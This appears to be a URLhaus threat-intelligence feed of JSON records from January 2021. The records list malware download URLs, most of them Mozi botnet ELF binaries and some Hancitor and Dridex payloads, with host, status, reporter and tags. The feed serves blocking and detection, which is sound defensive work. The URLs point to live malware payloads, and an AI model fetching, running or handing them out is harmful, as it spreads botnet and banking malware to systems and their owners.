+{"id":"961270","urlhaus_reference":"https://urlhaus.abuse.ch/url/961270/","url":"http://115.58.133.53:59599/Mozi.m","url_status":"online","host":"115.58.133.53","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961271","urlhaus_reference":"https://urlhaus.abuse.ch/url/961271/","url":"http://115.56.130.11:45189/Mozi.a","url_status":"online","host":"115.56.130.11","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961272","urlhaus_reference":"https://urlhaus.abuse.ch/url/961272/","url":"http://120.85.210.224:60805/Mozi.a","url_status":"online","host":"120.85.210.224","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961273","urlhaus_reference":"https://urlhaus.abuse.ch/url/961273/","url":"http://115.56.27.220:38888/Mozi.m","url_status":"online","host":"115.56.27.220","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961274","urlhaus_reference":"https://urlhaus.abuse.ch/url/961274/","url":"http://115.48.157.100:47869/Mozi.m","url_status":"online","host":"115.48.157.100","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961275","urlhaus_reference":"https://urlhaus.abuse.ch/url/961275/","url":"http://103.157.241.40:57478/Mozi.m","url_status":"online","host":"103.157.241.40","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961269","urlhaus_reference":"https://urlhaus.abuse.ch/url/961269/","url":"http://59.99.93.45:40256/bin.sh","url_status":"offline","host":"59.99.93.45","date_added":"2021-01-14 19:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961268","urlhaus_reference":"https://urlhaus.abuse.ch/url/961268/","url":"http://60.161.45.175:49035/Mozi.m","url_status":"online","host":"60.161.45.175","date_added":"2021-01-14 19:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961266","urlhaus_reference":"https://urlhaus.abuse.ch/url/961266/","url":"http://61.54.215.77:41531/Mozi.m","url_status":"online","host":"61.54.215.77","date_added":"2021-01-14 19:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961267","urlhaus_reference":"https://urlhaus.abuse.ch/url/961267/","url":"http://59.99.41.229:49596/Mozi.a","url_status":"offline","host":"59.99.41.229","date_added":"2021-01-14 19:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961265","urlhaus_reference":"https://urlhaus.abuse.ch/url/961265/","url":"http://61.52.197.146:43584/Mozi.m","url_status":"online","host":"61.52.197.146","date_added":"2021-01-14 19:07:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961264","urlhaus_reference":"https://urlhaus.abuse.ch/url/961264/","url":"http://59.92.181.82:44976/Mozi.m","url_status":"offline","host":"59.92.181.82","date_added":"2021-01-14 19:06:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961259","urlhaus_reference":"https://urlhaus.abuse.ch/url/961259/","url":"http://58.249.75.46:51107/Mozi.m","url_status":"online","host":"58.249.75.46","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961260","urlhaus_reference":"https://urlhaus.abuse.ch/url/961260/","url":"http://42.227.162.7:33790/Mozi.m","url_status":"online","host":"42.227.162.7","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961261","urlhaus_reference":"https://urlhaus.abuse.ch/url/961261/","url":"http://219.157.26.241:58919/Mozi.m","url_status":"online","host":"219.157.26.241","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961262","urlhaus_reference":"https://urlhaus.abuse.ch/url/961262/","url":"http://59.93.21.48:40395/Mozi.m","url_status":"offline","host":"59.93.21.48","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961263","urlhaus_reference":"https://urlhaus.abuse.ch/url/961263/","url":"http://59.92.216.111:53510/Mozi.m","url_status":"online","host":"59.92.216.111","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961258","urlhaus_reference":"https://urlhaus.abuse.ch/url/961258/","url":"http://183.17.147.46:39115/Mozi.m","url_status":"online","host":"183.17.147.46","date_added":"2021-01-14 19:05:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961257","urlhaus_reference":"https://urlhaus.abuse.ch/url/961257/","url":"http://123.14.93.124:40713/Mozi.m","url_status":"online","host":"123.14.93.124","date_added":"2021-01-14 19:05:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961256","urlhaus_reference":"https://urlhaus.abuse.ch/url/961256/","url":"http://182.59.195.56:54811/Mozi.m","url_status":"online","host":"182.59.195.56","date_added":"2021-01-14 19:05:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961255","urlhaus_reference":"https://urlhaus.abuse.ch/url/961255/","url":"http://153.37.155.55:58269/Mozi.a","url_status":"online","host":"153.37.155.55","date_added":"2021-01-14 19:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961251","urlhaus_reference":"https://urlhaus.abuse.ch/url/961251/","url":"http://123.14.95.248:47985/Mozi.m","url_status":"online","host":"123.14.95.248","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961252","urlhaus_reference":"https://urlhaus.abuse.ch/url/961252/","url":"http://185.106.46.2:38107/Mozi.m","url_status":"online","host":"185.106.46.2","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961253","urlhaus_reference":"https://urlhaus.abuse.ch/url/961253/","url":"http://123.14.180.59:50354/Mozi.m","url_status":"online","host":"123.14.180.59","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961254","urlhaus_reference":"https://urlhaus.abuse.ch/url/961254/","url":"http://190.140.131.14:44987/Mozi.m","url_status":"online","host":"190.140.131.14","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961249","urlhaus_reference":"https://urlhaus.abuse.ch/url/961249/","url":"http://125.43.33.108:44681/Mozi.m","url_status":"online","host":"125.43.33.108","date_added":"2021-01-14 19:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961250","urlhaus_reference":"https://urlhaus.abuse.ch/url/961250/","url":"http://123.14.65.211:58391/Mozi.m","url_status":"online","host":"123.14.65.211","date_added":"2021-01-14 19:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961248","urlhaus_reference":"https://urlhaus.abuse.ch/url/961248/","url":"http://117.194.164.34:48540/Mozi.a","url_status":"offline","host":"117.194.164.34","date_added":"2021-01-14 19:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961246","urlhaus_reference":"https://urlhaus.abuse.ch/url/961246/","url":"http://115.48.13.187:42755/Mozi.m","url_status":"online","host":"115.48.13.187","date_added":"2021-01-14 19:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961247","urlhaus_reference":"https://urlhaus.abuse.ch/url/961247/","url":"http://113.87.249.28:52688/Mozi.m","url_status":"online","host":"113.87.249.28","date_added":"2021-01-14 19:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961244","urlhaus_reference":"https://urlhaus.abuse.ch/url/961244/","url":"http://112.30.110.63:33782/Mozi.m","url_status":"online","host":"112.30.110.63","date_added":"2021-01-14 19:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961245","urlhaus_reference":"https://urlhaus.abuse.ch/url/961245/","url":"http://113.133.225.154:50381/Mozi.m","url_status":"online","host":"113.133.225.154","date_added":"2021-01-14 19:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961243","urlhaus_reference":"https://urlhaus.abuse.ch/url/961243/","url":"http://123.14.154.78:44219/Mozi.m","url_status":"online","host":"123.14.154.78","date_added":"2021-01-14 19:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961242","urlhaus_reference":"https://urlhaus.abuse.ch/url/961242/","url":"http://61.53.42.182:36619/bin.sh","url_status":"offline","host":"61.53.42.182","date_added":"2021-01-14 19:01:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961241","urlhaus_reference":"https://urlhaus.abuse.ch/url/961241/","url":"http://115.58.166.75:59976/i","url_status":"online","host":"115.58.166.75","date_added":"2021-01-14 18:56:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961239","urlhaus_reference":"https://urlhaus.abuse.ch/url/961239/","url":"http://59.92.217.228:48688/Mozi.a","url_status":"online","host":"59.92.217.228","date_added":"2021-01-14 18:51:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961240","urlhaus_reference":"https://urlhaus.abuse.ch/url/961240/","url":"http://221.145.179.219:45682/Mozi.m","url_status":"online","host":"221.145.179.219","date_added":"2021-01-14 18:51:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961238","urlhaus_reference":"https://urlhaus.abuse.ch/url/961238/","url":"http://59.99.136.49:34922/Mozi.m","url_status":"offline","host":"59.99.136.49","date_added":"2021-01-14 18:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961233","urlhaus_reference":"https://urlhaus.abuse.ch/url/961233/","url":"http://92.54.237.196:37489/Mozi.m","url_status":"online","host":"92.54.237.196","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961234","urlhaus_reference":"https://urlhaus.abuse.ch/url/961234/","url":"http://186.33.104.184:51940/Mozi.m","url_status":"online","host":"186.33.104.184","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961235","urlhaus_reference":"https://urlhaus.abuse.ch/url/961235/","url":"http://59.99.40.58:49599/Mozi.a","url_status":"offline","host":"59.99.40.58","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961236","urlhaus_reference":"https://urlhaus.abuse.ch/url/961236/","url":"http://59.99.92.249:53436/Mozi.m","url_status":"offline","host":"59.99.92.249","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961237","urlhaus_reference":"https://urlhaus.abuse.ch/url/961237/","url":"http://58.249.11.35:57237/Mozi.a","url_status":"online","host":"58.249.11.35","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961232","urlhaus_reference":"https://urlhaus.abuse.ch/url/961232/","url":"http://42.224.251.45:50907/Mozi.m","url_status":"online","host":"42.224.251.45","date_added":"2021-01-14 18:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961231","urlhaus_reference":"https://urlhaus.abuse.ch/url/961231/","url":"http://117.208.134.248:41910/Mozi.m","url_status":"online","host":"117.208.134.248","date_added":"2021-01-14 18:50:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961229","urlhaus_reference":"https://urlhaus.abuse.ch/url/961229/","url":"http://115.55.93.86:57217/Mozi.m","url_status":"online","host":"115.55.93.86","date_added":"2021-01-14 18:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961230","urlhaus_reference":"https://urlhaus.abuse.ch/url/961230/","url":"http://117.196.50.105:47632/Mozi.m","url_status":"online","host":"117.196.50.105","date_added":"2021-01-14 18:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961227","urlhaus_reference":"https://urlhaus.abuse.ch/url/961227/","url":"http://116.75.197.63:46654/Mozi.a","url_status":"online","host":"116.75.197.63","date_added":"2021-01-14 18:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961228","urlhaus_reference":"https://urlhaus.abuse.ch/url/961228/","url":"http://115.55.33.224:59073/Mozi.m","url_status":"online","host":"115.55.33.224","date_added":"2021-01-14 18:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961221","urlhaus_reference":"https://urlhaus.abuse.ch/url/961221/","url":"http://116.75.192.61:37958/Mozi.a","url_status":"offline","host":"116.75.192.61","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961222","urlhaus_reference":"https://urlhaus.abuse.ch/url/961222/","url":"http://119.178.250.25:53943/Mozi.m","url_status":"online","host":"119.178.250.25","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961223","urlhaus_reference":"https://urlhaus.abuse.ch/url/961223/","url":"http://115.59.212.117:40404/Mozi.m","url_status":"online","host":"115.59.212.117","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961224","urlhaus_reference":"https://urlhaus.abuse.ch/url/961224/","url":"http://182.114.210.156:46738/Mozi.m","url_status":"online","host":"182.114.210.156","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961225","urlhaus_reference":"https://urlhaus.abuse.ch/url/961225/","url":"http://123.12.231.116:58234/Mozi.m","url_status":"online","host":"123.12.231.116","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961226","urlhaus_reference":"https://urlhaus.abuse.ch/url/961226/","url":"http://182.59.230.66:36911/Mozi.a","url_status":"online","host":"182.59.230.66","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961220","urlhaus_reference":"https://urlhaus.abuse.ch/url/961220/","url":"http://115.207.21.23:35028/Mozi.m","url_status":"online","host":"115.207.21.23","date_added":"2021-01-14 18:49:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961219","urlhaus_reference":"https://urlhaus.abuse.ch/url/961219/","url":"http://allanabolicsteam.net/nedfr_.exe","url_status":"offline","host":"allanabolicsteam.net","date_added":"2021-01-14 18:47:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"Myrtus0x0","larted":"true","tags":["c2","hancitor","payload"]} +{"id":"961217","urlhaus_reference":"https://urlhaus.abuse.ch/url/961217/","url":"https://intranetstc.micromart.com.br/fined.php","url_status":"offline","host":"intranetstc.micromart.com.br","date_added":"2021-01-14 18:47:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"0x49736b","larted":"false","tags":["Dridex"]} +{"id":"961218","urlhaus_reference":"https://urlhaus.abuse.ch/url/961218/","url":"http://allanabolicsteam.net/1301s.bin","url_status":"online","host":"allanabolicsteam.net","date_added":"2021-01-14 18:47:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"Myrtus0x0","larted":"true","tags":["c2","hancitor","payload"]} +{"id":"961216","urlhaus_reference":"https://urlhaus.abuse.ch/url/961216/","url":"http://61.53.222.100:43741/i","url_status":"online","host":"61.53.222.100","date_added":"2021-01-14 18:44:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961215","urlhaus_reference":"https://urlhaus.abuse.ch/url/961215/","url":"http://42.225.52.44:45803/bin.sh","url_status":"offline","host":"42.225.52.44","date_added":"2021-01-14 18:41:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"false","tags":["32-bit","elf","mips"]} +{"id":"961214","urlhaus_reference":"https://urlhaus.abuse.ch/url/961214/","url":"http://191.242.38.33:38611/Mozi.m","url_status":"offline","host":"191.242.38.33","date_added":"2021-01-14 18:36:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961213","urlhaus_reference":"https://urlhaus.abuse.ch/url/961213/","url":"http://59.97.171.225:35185/Mozi.m","url_status":"offline","host":"59.97.171.225","date_added":"2021-01-14 18:36:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961212","urlhaus_reference":"https://urlhaus.abuse.ch/url/961212/","url":"http://189.51.102.115:35054/Mozi.m","url_status":"offline","host":"189.51.102.115","date_added":"2021-01-14 18:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961207","urlhaus_reference":"https://urlhaus.abuse.ch/url/961207/","url":"http://42.235.186.115:60038/Mozi.m","url_status":"online","host":"42.235.186.115","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961208","urlhaus_reference":"https://urlhaus.abuse.ch/url/961208/","url":"http://219.157.134.199:52253/Mozi.m","url_status":"online","host":"219.157.134.199","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961209","urlhaus_reference":"https://urlhaus.abuse.ch/url/961209/","url":"http://221.14.21.135:43125/Mozi.m","url_status":"online","host":"221.14.21.135","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961210","urlhaus_reference":"https://urlhaus.abuse.ch/url/961210/","url":"http://58.248.118.230:52650/Mozi.a","url_status":"online","host":"58.248.118.230","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961211","urlhaus_reference":"https://urlhaus.abuse.ch/url/961211/","url":"http://219.155.30.125:59273/Mozi.m","url_status":"online","host":"219.155.30.125","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961206","urlhaus_reference":"https://urlhaus.abuse.ch/url/961206/","url":"http://121.159.74.78:40346/Mozi.m","url_status":"online","host":"121.159.74.78","date_added":"2021-01-14 18:35:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961204","urlhaus_reference":"https://urlhaus.abuse.ch/url/961204/","url":"http://179.227.77.63:44242/Mozi.m","url_status":"offline","host":"179.227.77.63","date_added":"2021-01-14 18:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961205","urlhaus_reference":"https://urlhaus.abuse.ch/url/961205/","url":"http://117.194.167.179:40624/Mozi.m","url_status":"offline","host":"117.194.167.179","date_added":"2021-01-14 18:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961202","urlhaus_reference":"https://urlhaus.abuse.ch/url/961202/","url":"http://123.9.103.67:41245/Mozi.m","url_status":"online","host":"123.9.103.67","date_added":"2021-01-14 18:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961203","urlhaus_reference":"https://urlhaus.abuse.ch/url/961203/","url":"http://182.116.67.218:48866/Mozi.m","url_status":"online","host":"182.116.67.218","date_added":"2021-01-14 18:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961198","urlhaus_reference":"https://urlhaus.abuse.ch/url/961198/","url":"http://125.41.142.109:58258/Mozi.m","url_status":"online","host":"125.41.142.109","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961199","urlhaus_reference":"https://urlhaus.abuse.ch/url/961199/","url":"http://123.9.243.249:34516/Mozi.m","url_status":"online","host":"123.9.243.249","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961200","urlhaus_reference":"https://urlhaus.abuse.ch/url/961200/","url":"http://120.85.171.199:47851/Mozi.m","url_status":"online","host":"120.85.171.199","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961201","urlhaus_reference":"https://urlhaus.abuse.ch/url/961201/","url":"http://186.33.122.79:49226/Mozi.m","url_status":"online","host":"186.33.122.79","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961197","urlhaus_reference":"https://urlhaus.abuse.ch/url/961197/","url":"http://103.97.139.251:36957/bin.sh","url_status":"online","host":"103.97.139.251","date_added":"2021-01-14 18:34:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961196","urlhaus_reference":"https://urlhaus.abuse.ch/url/961196/","url":"http://115.54.114.20:53089/Mozi.m","url_status":"online","host":"115.54.114.20","date_added":"2021-01-14 18:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961193","urlhaus_reference":"https://urlhaus.abuse.ch/url/961193/","url":"http://103.161.49.76:57114/Mozi.m","url_status":"online","host":"103.161.49.76","date_added":"2021-01-14 18:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961194","urlhaus_reference":"https://urlhaus.abuse.ch/url/961194/","url":"http://115.56.159.83:33163/Mozi.a","url_status":"online","host":"115.56.159.83","date_added":"2021-01-14 18:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961195","urlhaus_reference":"https://urlhaus.abuse.ch/url/961195/","url":"http://115.56.181.246:48557/Mozi.m","url_status":"online","host":"115.56.181.246","date_added":"2021-01-14 18:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 